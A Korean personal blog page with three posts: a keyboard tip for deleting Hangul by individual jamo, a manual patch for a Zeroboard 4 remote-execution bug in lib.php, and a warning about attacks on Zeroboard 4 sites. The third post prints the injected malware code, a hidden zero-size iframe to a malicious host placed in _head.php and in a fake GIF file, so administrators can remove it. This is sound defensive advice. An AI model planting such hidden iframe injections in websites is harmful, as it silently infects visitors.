사용자 삽입 이미지

뷁을 입력하고 Ctrl + delete를 입력하였을 때.


얼마전 새로운 사실을 알았습니다.


한참 쓰면서도 이런 기능이 있을것이라고는 생각도 못했는데,

한글을 자모 단위로 잘라서 지우는 기능이 있었습니다.

보통 일반 윈도우에서는 한글을 입력할 때 는 물론 한뒤로 쪼개서 지울 수 있지만

이미 입력이 끝난 경우에는 '한 글자' 단위로 삭제되었습니다.

물론 이쪽에서도 마찬가지이였지만, 얼마전 키보드로 문자를 입력하던중

새로운 현상을 발견하였습니다. 한글을 입력하고 지울 때 Ctrl + delete를 누르면

이미 입력이 완료된 글자 안에서도 자음과 모음을 따로따로 해서 지울 수 있습니다.

다만 [뷁]을 입력하였을 경우 아직 입력이 종료되지 않은 상태라면

[ㅂ][ㅜ][ㅔ][ㄹ][ㄱ] 이렇게 분해가 되지만

입력이 끝나고 삭제를 하면

[ㅂ][ㅞ][ㄹㄱ] 이렇기 분해가 됩니다.

아무튼 이런 기능도 있다는것을 알았습니다.

참고로 alt(option) + delete는 단어 단위 삭제입니다.

윈도우에도 비슷하게 Ctrl + Backspace로 가능합니다.
Posted by Parker Falcon

결국 패치가 나왔습니다.

우선 문제는 lib.php파일에 있었나봅니다.

제로보드4 원격실행 취약 버그 패치해주세요. 제로보드 4.1 pl8 - 2007. 11. 1일 보안 버그까지 적용

수동 해결 방안도 함께 이렇게 제시하고 있습니다.

  1. lib.php 파일을 에디터 등으로 연다
  2. $REMOTE_ADDR 이라는 글자를 모두 $_SERVER['REMOTE_ADDR'] 로 변경
  3. 이 때 global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect; 이라는 부분에서는
    global $HTTP_SESSION_VARS, $member_table, $member, $connect; 로 변경을 한다.

하지만 편집 프로그램의 찾아 바꾸기 기능으로 마구 바꾸시면 곤란하구요.

혹시 php의 문법을 (아니라 C의 문법이라도 ) 아시는 분이시라면

lib.php에서 REMOTE_ADDR을 찾아보면


두종류가 있습니다.

하나는 선언 부분인데

global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect;
global $HTTP_SESSION_VARS, $member_table, $member, $connect;

이렇게 선언문, 그러니까 앞에 global이 있는 문장에서는

$REMOTE_ADDR 은 삭제하시고,

$zb_logged_ip=$REMOTE_ADDR;
$zb_logged_ip=$_SERVER['REMOTE_ADDR'];

이렇게 실제로 쓰이는 부분에서는, 그러니까 앞에 global이 없을 때는

$REMOTE_ADDR 을 $_SERVER['REMOTE_ADDR']로 바꾸시면 됩니다.

Posted by Parker Falcon

요즘 제로보드4에 대한 중국발 해킹이 늘어나면서
많은 홈페이지가 감염되고, 또한 사용자들도 감염되고 있습니다.


당장의 대책이라면 _head.php에

<iframe width='0' height='0' src='http://d[.]xin8[.]info/daipi/css.htm'></iframe>
이것을 제거하시구요.
그리고 images폴더 아래에 admin_info.gif파일이 있는데
이것도 제거하십시요.
파일 내용은
images/admin_info.gif

document.write("<iframe width='0' height='0' src='http://d[.]xin8[.]info/daipi/css.htm'></iframe>");

이러합니다.


그리고 이런 작업은 홈페이지 관리자만 할 수 있습니다.

관리자가 할 수 있는 것은 제로보드의 최신 패치를 업데이트 하는 것 입니다.

제가 본 사이트 대부분이 2006년 3월 15일자 패치만을 해 둔 상태인데

http://www.zeroboard.com/zb4_download/803874

로 가셔서 2007년 5월 23일짜 보안 패치까지 된 pl8버전을 받으시기 바랍니다.
제로보드에서 업데이트 중에 pl의 숫자를 올리지 않아서
많은 사람들이 업데이트가 없다고 생각한 것인지는 모르겠지만
아무튼 많은 분들께서 더이상의 업데이트를 하지 않으셨습니다.

그리고 일반 사용자분들 께서 하실 수 있는 일은

인터넷 익스플로어를 사용하신다면

도구 - 인터넷 옵션 - 보안 으로 가셔서

제한된 사이트 클릭하시고 목록에 *.xin8.info 를 입력하고 추가하시기 바랍니다.

다른 브라우져 (Firefox, Opera, Safari)를 사용 하시는 분들은 상관 없지만

인터넷 익스플로어 엔진을 사용하는 브라우져를 사용하시는 분들은 똑같이 추가하시기 바랍니다.

아무튼 다들 피해 없으시기 바랍니다 :)

Posted by Parker Falcon